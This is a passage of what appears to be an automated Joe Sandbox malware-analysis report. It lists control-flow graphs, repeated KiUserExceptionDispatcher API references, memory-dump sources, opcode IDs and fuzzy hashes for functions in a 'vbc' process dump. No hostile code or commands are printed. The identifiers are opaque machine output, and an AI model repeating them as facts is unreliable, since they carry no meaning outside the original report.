9ee8340 call a3f8f18 3346->3442 3443 9ee8340 call a3f8f77 3346->3443 3444 9ee8340 call a3f88e0 3346->3444 3445 9ee8340 call a3f8940 3346->3445 3349 9ee8346-9ee8388 3449 9ee8388 call a3f9038 3349->3449 3450 9ee8388 call a3f9030 3349->3450 3352 9ee838e-9ee8454 call a3fa578 3398 9ee8454 call a3fba28 3352->3398 3399 9ee8454 call a3fb892 3352->3399 3361 9ee845a-9ee8730 KiUserExceptionDispatcher 3391 9ee8737-9ee876d 3361->3391 3394->3283 3395->3283 3396->3283 3397->3283 3398->3361 3399->3361 3400->3322 3401->3322 3402->3322 3403->3325 3404->3325 3405->3325 3406->3286 3407->3286 3408->3289 3409->3289 3410->3289 3411->3328 3412->3328 3413->3328 3414->3295 3415->3295 3416->3295 3417->3340 3418->3340 3419->3340 3420->3343 3421->3343 3422->3343 3423->3343 3424->3304 3425->3304 3426->3304 3427->3304 3428->3304 3429->3307 3430->3307 3431->3307 3432->3268 3433->3268 3434->3268 3435->3268 3436->3268 3437->3268 3438->3346 3439->3346 3440->3349 3441->3349 3442->3349 3443->3349 3444->3349 3445->3349 3446->3313 3447->3313 3448->3313 3449->3352 3450->3352 3451->3277 3452->3277
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 6f429e950457e1c04246dfe50721e8324f97f6c5f9a21591af9278a3578b6dfa
                                                              • Instruction ID: 3f2a0658407e1667244ddf9da480bd23d11a4b02d9490dbaba6323e10df928e5
                                                              • Opcode Fuzzy Hash: 6f429e950457e1c04246dfe50721e8324f97f6c5f9a21591af9278a3578b6dfa
                                                              • Instruction Fuzzy Hash: 18F1ED7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7C0D Relevance: 3.3, APIs: 2, Instructions: 305COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3453 9ee7c0d-9ee7cb2 call 9ee5a68 call 9ee5bf8 3597 9ee7cb2 call a3f202e 3453->3597 3598 9ee7cb2 call a3f2090 3453->3598 3465 9ee7cb8-9ee7d33 3600 9ee7d33 call a3f3208 3465->3600 3601 9ee7d33 call a3f32a8 3465->3601 3602 9ee7d33 call a3f3158 3465->3602 3603 9ee7d33 call a3f3307 3465->3603 3471 9ee7d39-9ee7d78 3612 9ee7d78 call a3f3369 3471->3612 3613 9ee7d78 call a3f33c8 3471->3613 3474 9ee7d7e-9ee7dbd 3614 9ee7dbd call a3f39ff 3474->3614 3615 9ee7dbd call a3f3691 3474->3615 3616 9ee7dbd call a3f3900 3474->3616 3477 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3620 9ee7e5d call a3f3ecf 3477->3620 3621 9ee7e5d call a3f3fdf 3477->3621 3622 9ee7e5d call a3f3f80 3477->3622 3483 9ee7e63-9ee7f2c 3630 9ee7f2c call a3f4279 3483->3630 3631 9ee7f2c call a3f4679 3483->3631 3632 9ee7f2c call a3f4288 3483->3632 3633 9ee7f2c call a3f4651 3483->3633 3634 9ee7f2c call a3f4320 3483->3634 3492 9ee7f32-9ee7f71 3581 9ee7f71 call a3f5ef8 3492->3581 3582 9ee7f71 call a3f5ee8 3492->3582 3583 9ee7f71 call a3f5f57 3492->3583 3495 9ee7f77-9ee7ffb 3592 9ee7ffb call a3f62ef 3495->3592 3593 9ee7ffb call a3f623c 3495->3593 3594 9ee7ffb call a3f6290 3495->3594 3501 9ee8001-9ee80c1 3606 9ee80c1 call a3f6be8 3501->3606 3607 9ee80c1 call a3f6d38 3501->3607 3608 9ee80c1 call a3f6d97 3501->3608 3510 9ee80c7-9ee8106 3609 9ee8106 call a3f6df9 3510->3609 3610 9ee8106 call a3f6e58 3510->3610 3611 9ee8106 call a3f6eb7 3510->3611 3513 9ee810c-9ee814b 3617 9ee814b call a3f6f18 3513->3617 3618 9ee814b call a3f6f78 3513->3618 3619 9ee814b call a3f6fd7 3513->3619 3516 9ee8151-9ee8268 3623 9ee8268 call a3f8149 3516->3623 3624 9ee8268 call a3f8158 3516->3624 3625 9ee8268 call a3f80b0 3516->3625 3528 9ee826e-9ee82b0 3626 9ee82b0 call a3f887f 3528->3626 3627 9ee82b0 call a3f83f8 3528->3627 3628 9ee82b0 call a3f85b8 3528->3628 3629 9ee82b0 call a3f8820 3528->3629 3531 9ee82b6-9ee82f8 3584 9ee82f8 call a3f88e0 3531->3584 3585 9ee82f8 call a3f8940 3531->3585 3534 9ee82fe-9ee8340 3586 9ee8340 call a3f8b7f 3534->3586 3587 9ee8340 call a3f8e1c 3534->3587 3588 9ee8340 call a3f8f18 3534->3588 3589 9ee8340 call a3f8f77 3534->3589 3590 9ee8340 call a3f88e0 3534->3590 3591 9ee8340 call a3f8940 3534->3591 3537 9ee8346-9ee8388 3595 9ee8388 call a3f9038 3537->3595 3596 9ee8388 call a3f9030 3537->3596 3540 9ee838e-9ee8454 call a3fa578 3604 9ee8454 call a3fba28 3540->3604 3605 9ee8454 call a3fb892 3540->3605 3549 9ee845a-9ee8730 KiUserExceptionDispatcher 3579 9ee8737-9ee876d 3549->3579 3581->3495 3582->3495 3583->3495 3584->3534 3585->3534 3586->3537 3587->3537 3588->3537 3589->3537 3590->3537 3591->3537 3592->3501 3593->3501 3594->3501 3595->3540 3596->3540 3597->3465 3598->3465 3600->3471 3601->3471 3602->3471 3603->3471 3604->3549 3605->3549 3606->3510 3607->3510 3608->3510 3609->3513 3610->3513 3611->3513 3612->3474 3613->3474 3614->3477 3615->3477 3616->3477 3617->3516 3618->3516 3619->3516 3620->3483 3621->3483 3622->3483 3623->3528 3624->3528 3625->3528 3626->3531 3627->3531 3628->3531 3629->3531 3630->3492 3631->3492 3632->3492 3633->3492 3634->3492
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 47d470275414471e573c93c975e7153b56c6d8ac38827845d41faaf3479f87b1
                                                              • Instruction ID: ce7e4d2e3f9ca4fb46c259a8779409f0b044133fe5ade28fe985a2b40efc49fa
                                                              • Opcode Fuzzy Hash: 47d470275414471e573c93c975e7153b56c6d8ac38827845d41faaf3479f87b1
                                                              • Instruction Fuzzy Hash: D2F1ED7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7C52 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3635 9ee7c52-9ee7cb2 call 9ee5a68 call 9ee5bf8 3760 9ee7cb2 call a3f202e 3635->3760 3761 9ee7cb2 call a3f2090 3635->3761 3644 9ee7cb8-9ee7d33 3766 9ee7d33 call a3f3208 3644->3766 3767 9ee7d33 call a3f32a8 3644->3767 3768 9ee7d33 call a3f3158 3644->3768 3769 9ee7d33 call a3f3307 3644->3769 3650 9ee7d39-9ee7d78 3772 9ee7d78 call a3f3369 3650->3772 3773 9ee7d78 call a3f33c8 3650->3773 3653 9ee7d7e-9ee7dbd 3780 9ee7dbd call a3f39ff 3653->3780 3781 9ee7dbd call a3f3691 3653->3781 3782 9ee7dbd call a3f3900 3653->3782 3656 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3783 9ee7e5d call a3f3ecf 3656->3783 3784 9ee7e5d call a3f3fdf 3656->3784 3785 9ee7e5d call a3f3f80 3656->3785 3662 9ee7e63-9ee7f2c 3789 9ee7f2c call a3f4279 3662->3789 3790 9ee7f2c call a3f4679 3662->3790 3791 9ee7f2c call a3f4288 3662->3791 3792 9ee7f2c call a3f4651 3662->3792 3793 9ee7f2c call a3f4320 3662->3793 3671 9ee7f32-9ee7f71 3800 9ee7f71 call a3f5ef8 3671->3800 3801 9ee7f71 call a3f5ee8 3671->3801 3802 9ee7f71 call a3f5f57 3671->3802 3674 9ee7f77-9ee7ffb 3811 9ee7ffb call a3f62ef 3674->3811 3812 9ee7ffb call a3f623c 3674->3812 3813 9ee7ffb call a3f6290 3674->3813 3680 9ee8001-9ee80c1 3763 9ee80c1 call a3f6be8 3680->3763 3764 9ee80c1 call a3f6d38 3680->3764 3765 9ee80c1 call a3f6d97 3680->3765 3689 9ee80c7-9ee8106 3774 9ee8106 call a3f6df9 3689->3774 3775 9ee8106 call a3f6e58 3689->3775 3776 9ee8106 call a3f6eb7 3689->3776 3692 9ee810c-9ee814b 3777 9ee814b call a3f6f18 3692->3777 3778 9ee814b call a3f6f78 3692->3778 3779 9ee814b call a3f6fd7 3692->3779 3695 9ee8151-9ee8268 3786 9ee8268 call a3f8149 3695->3786 3787 9ee8268 call a3f8158 3695->3787 3788 9ee8268 call a3f80b0 3695->3788 3707 9ee826e-9ee82b0 3794 9ee82b0 call a3f887f 3707->3794 3795 9ee82b0 call a3f83f8 3707->3795 3796 9ee82b0 call a3f85b8 3707->3796 3797 9ee82b0 call a3f8820 3707->3797 3710 9ee82b6-9ee82f8 3798 9ee82f8 call a3f88e0 3710->3798 3799 9ee82f8 call a3f8940 3710->3799 3713 9ee82fe-9ee8340 3803 9ee8340 call a3f8b7f 3713->3803 3804 9ee8340 call a3f8e1c 3713->3804 3805 9ee8340 call a3f8f18 3713->3805 3806 9ee8340 call a3f8f77 3713->3806 3807 9ee8340 call a3f88e0 3713->3807 3808 9ee8340 call a3f8940 3713->3808 3716 9ee8346-9ee8388 3809 9ee8388 call a3f9038 3716->3809 3810 9ee8388 call a3f9030 3716->3810 3719 9ee838e-9ee8454 call a3fa578 3770 9ee8454 call a3fba28 3719->3770 3771 9ee8454 call a3fb892 3719->3771 3728 9ee845a-9ee8730 KiUserExceptionDispatcher 3758 9ee8737-9ee876d 3728->3758 3760->3644 3761->3644 3763->3689 3764->3689 3765->3689 3766->3650 3767->3650 3768->3650 3769->3650 3770->3728 3771->3728 3772->3653 3773->3653 3774->3692 3775->3692 3776->3692 3777->3695 3778->3695 3779->3695 3780->3656 3781->3656 3782->3656 3783->3662 3784->3662 3785->3662 3786->3707 3787->3707 3788->3707 3789->3671 3790->3671 3791->3671 3792->3671 3793->3671 3794->3710 3795->3710 3796->3710 3797->3710 3798->3713 3799->3713 3800->3674 3801->3674 3802->3674 3803->3716 3804->3716 3805->3716 3806->3716 3807->3716 3808->3716 3809->3719 3810->3719 3811->3680 3812->3680 3813->3680
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 40a556f8cfa82282a630191465c2997cf4d2581ca6f5c042a4be98a00590202e
                                                              • Instruction ID: f491709427070dc359ae331d9662a5d696e55f940240ac230bb764b05bdbbc6a
                                                              • Opcode Fuzzy Hash: 40a556f8cfa82282a630191465c2997cf4d2581ca6f5c042a4be98a00590202e
                                                              • Instruction Fuzzy Hash: 99F1ED7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7C8E Relevance: 3.3, APIs: 2, Instructions: 291COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3814 9ee7c8e-9ee7cb2 call 9ee5a68 call 9ee5bf8 3967 9ee7cb2 call a3f202e 3814->3967 3968 9ee7cb2 call a3f2090 3814->3968 3820 9ee7cb8-9ee7d33 3970 9ee7d33 call a3f3208 3820->3970 3971 9ee7d33 call a3f32a8 3820->3971 3972 9ee7d33 call a3f3158 3820->3972 3973 9ee7d33 call a3f3307 3820->3973 3826 9ee7d39-9ee7d78 3982 9ee7d78 call a3f3369 3826->3982 3983 9ee7d78 call a3f33c8 3826->3983 3829 9ee7d7e-9ee7dbd 3984 9ee7dbd call a3f39ff 3829->3984 3985 9ee7dbd call a3f3691 3829->3985 3986 9ee7dbd call a3f3900 3829->3986 3832 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3936 9ee7e5d call a3f3ecf 3832->3936 3937 9ee7e5d call a3f3fdf 3832->3937 3938 9ee7e5d call a3f3f80 3832->3938 3838 9ee7e63-9ee7f2c 3946 9ee7f2c call a3f4279 3838->3946 3947 9ee7f2c call a3f4679 3838->3947 3948 9ee7f2c call a3f4288 3838->3948 3949 9ee7f2c call a3f4651 3838->3949 3950 9ee7f2c call a3f4320 3838->3950 3847 9ee7f32-9ee7f71 3951 9ee7f71 call a3f5ef8 3847->3951 3952 9ee7f71 call a3f5ee8 3847->3952 3953 9ee7f71 call a3f5f57 3847->3953 3850 9ee7f77-9ee7ffb 3962 9ee7ffb call a3f62ef 3850->3962 3963 9ee7ffb call a3f623c 3850->3963 3964 9ee7ffb call a3f6290 3850->3964 3856 9ee8001-9ee80c1 3976 9ee80c1 call a3f6be8 3856->3976 3977 9ee80c1 call a3f6d38 3856->3977 3978 9ee80c1 call a3f6d97 3856->3978 3865 9ee80c7-9ee8106 3979 9ee8106 call a3f6df9 3865->3979 3980 9ee8106 call a3f6e58 3865->3980 3981 9ee8106 call a3f6eb7 3865->3981 3868 9ee810c-9ee814b 3987 9ee814b call a3f6f18 3868->3987 3988 9ee814b call a3f6f78 3868->3988 3989 9ee814b call a3f6fd7 3868->3989 3871 9ee8151-9ee8268 3939 9ee8268 call a3f8149 3871->3939 3940 9ee8268 call a3f8158 3871->3940 3941 9ee8268 call a3f80b0 3871->3941 3883 9ee826e-9ee82b0 3942 9ee82b0 call a3f887f 3883->3942 3943 9ee82b0 call a3f83f8 3883->3943 3944 9ee82b0 call a3f85b8 3883->3944 3945 9ee82b0 call a3f8820 3883->3945 3886 9ee82b6-9ee82f8 3954 9ee82f8 call a3f88e0 3886->3954 3955 9ee82f8 call a3f8940 3886->3955 3889 9ee82fe-9ee8340 3956 9ee8340 call a3f8b7f 3889->3956 3957 9ee8340 call a3f8e1c 3889->3957 3958 9ee8340 call a3f8f18 3889->3958 3959 9ee8340 call a3f8f77 3889->3959 3960 9ee8340 call a3f88e0 3889->3960 3961 9ee8340 call a3f8940 3889->3961 3892 9ee8346-9ee8388 3965 9ee8388 call a3f9038 3892->3965 3966 9ee8388 call a3f9030 3892->3966 3895 9ee838e-9ee8454 call a3fa578 3974 9ee8454 call a3fba28 3895->3974 3975 9ee8454 call a3fb892 3895->3975 3904 9ee845a-9ee8730 KiUserExceptionDispatcher 3934 9ee8737-9ee876d 3904->3934 3936->3838 3937->3838 3938->3838 3939->3883 3940->3883 3941->3883 3942->3886 3943->3886 3944->3886 3945->3886 3946->3847 3947->3847 3948->3847 3949->3847 3950->3847 3951->3850 3952->3850 3953->3850 3954->3889 3955->3889 3956->3892 3957->3892 3958->3892 3959->3892 3960->3892 3961->3892 3962->3856 3963->3856 3964->3856 3965->3895 3966->3895 3967->3820 3968->3820 3970->3826 3971->3826 3972->3826 3973->3826 3974->3904 3975->3904 3976->3865 3977->3865 3978->3865 3979->3868 3980->3868 3981->3868 3982->3829 3983->3829 3984->3832 3985->3832 3986->3832 3987->3871 3988->3871 3989->3871
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 8b4905a9301571eb2b7f779a5289c290ae6d0d3f228db9eb03a324ffa1915900
                                                              • Instruction ID: da04c8799f2ee3a777391bd0e8a0aeda6c56176c65e493e39b18d561015bcf99
                                                              • Opcode Fuzzy Hash: 8b4905a9301571eb2b7f779a5289c290ae6d0d3f228db9eb03a324ffa1915900
                                                              • Instruction Fuzzy Hash: 13E1DC7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7CD3 Relevance: 3.3, APIs: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 2059edb860438341efe14813ad5497c6f442b0c281074cfb0ae1cd34d7be956d
                                                              • Instruction ID: 0a3965cb13f929e965efeba66728340a8a65e42240bea646d638612a7c09f4bc
                                                              • Opcode Fuzzy Hash: 2059edb860438341efe14813ad5497c6f442b0c281074cfb0ae1cd34d7be956d
                                                              • Instruction Fuzzy Hash: 43E1EC7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7D18 Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 6ba54628ad69058459dfec402553a150bb4b1e52656f2c46b82da4504b21a6f3
                                                              • Instruction ID: b4f660afccdd45f7e922d95bc35d5538153b69310ba0a3f576bdc4901761774e
                                                              • Opcode Fuzzy Hash: 6ba54628ad69058459dfec402553a150bb4b1e52656f2c46b82da4504b21a6f3
                                                              • Instruction Fuzzy Hash: 34E1ED7490A298CFCB66DF74E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7D54 Relevance: 3.3, APIs: 2, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 1e88e3277f977af53dc89c1f4b2268f63485524e9e0c97bb437f30121a720211
                                                              • Instruction ID: 3968764d554559c0c153abbd00f8f13e54682d119dd84677384e47ccbaa128a1
                                                              • Opcode Fuzzy Hash: 1e88e3277f977af53dc89c1f4b2268f63485524e9e0c97bb437f30121a720211
                                                              • Instruction Fuzzy Hash: 9DE1EC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7D99 Relevance: 3.3, APIs: 2, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 81ba3eef43a740523d96698ab6cf7606ea1eff2471fd09a55abced53f85a4c04
                                                              • Instruction ID: 1371ac4a5f2d29285874377242b88b3433bb054cc04ee23860dc9715216ce4ee
                                                              • Opcode Fuzzy Hash: 81ba3eef43a740523d96698ab6cf7606ea1eff2471fd09a55abced53f85a4c04
                                                              • Instruction Fuzzy Hash: A9D1FD7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7DDE Relevance: 3.3, APIs: 2, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 4fb6bf92e485aafba143ef565e8fe0782af778e18a7d3809690b514c9b1b1780
                                                              • Instruction ID: f07794db5d1827e9f4b4d8d2b69d9d68e0ae2e3e3774c0cc6d319f3dde9f080f
                                                              • Opcode Fuzzy Hash: 4fb6bf92e485aafba143ef565e8fe0782af778e18a7d3809690b514c9b1b1780
                                                              • Instruction Fuzzy Hash: 2CD1EC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7E39 Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 908f1840e0a7db8de94ff11fd6c2c53faab6d8f2551fca0b92c1fb3d325a31d3
                                                              • Instruction ID: 0064e6bd1652c23d598f39e115736632e3ac66e7c501e561149928e822dd9b25
                                                              • Opcode Fuzzy Hash: 908f1840e0a7db8de94ff11fd6c2c53faab6d8f2551fca0b92c1fb3d325a31d3
                                                              • Instruction Fuzzy Hash: 3BD1DC7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E85CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7E7E Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: bb4131fd088bc7e77c82c29bdc48cc991648b334f4e3b4534d7fe990bfb565a2
                                                              • Instruction ID: ad3407f614c916de51ed87a3b27d86d4bee0bc55f2479b3c0284f9ed02aa4a90
                                                              • Opcode Fuzzy Hash: bb4131fd088bc7e77c82c29bdc48cc991648b334f4e3b4534d7fe990bfb565a2
                                                              • Instruction Fuzzy Hash: 8AC1CC7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355E85CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7EC3 Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: d505c295c98d4333f4d51779ec2127293ab855cdf8c645c562a0353bc0cd5c41
                                                              • Instruction ID: fd72036695f152c1e8600e0bfd0a040421cf1a7c8e5a53b8bd6cc3d5bde41331
                                                              • Opcode Fuzzy Hash: d505c295c98d4333f4d51779ec2127293ab855cdf8c645c562a0353bc0cd5c41
                                                              • Instruction Fuzzy Hash: DBC1CB7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7F08 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 994a58c7bc4c430e442a26648a831f9db1ca9213b15b7f68a544f8bef1194fe3
                                                              • Instruction ID: 3f4f63f3c25bf0cd675d0133201ddf74f16f27d4db8413dfb4e40a08de59d13a
                                                              • Opcode Fuzzy Hash: 994a58c7bc4c430e442a26648a831f9db1ca9213b15b7f68a544f8bef1194fe3
                                                              • Instruction Fuzzy Hash: EFC1CB7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7F4D Relevance: 1.7, APIs: 1, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 00cbd77139ca30a97d409fbdb42896ef2012f5f42db626c297a5a4d5cc4eb9b6
                                                              • Instruction ID: cbcdf204cd04036b7132f7b4fd2a47ad8317c601717406e45fcc46a1bcb11f74
                                                              • Opcode Fuzzy Hash: 00cbd77139ca30a97d409fbdb42896ef2012f5f42db626c297a5a4d5cc4eb9b6
                                                              • Instruction Fuzzy Hash: BEB1CB7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7F92 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
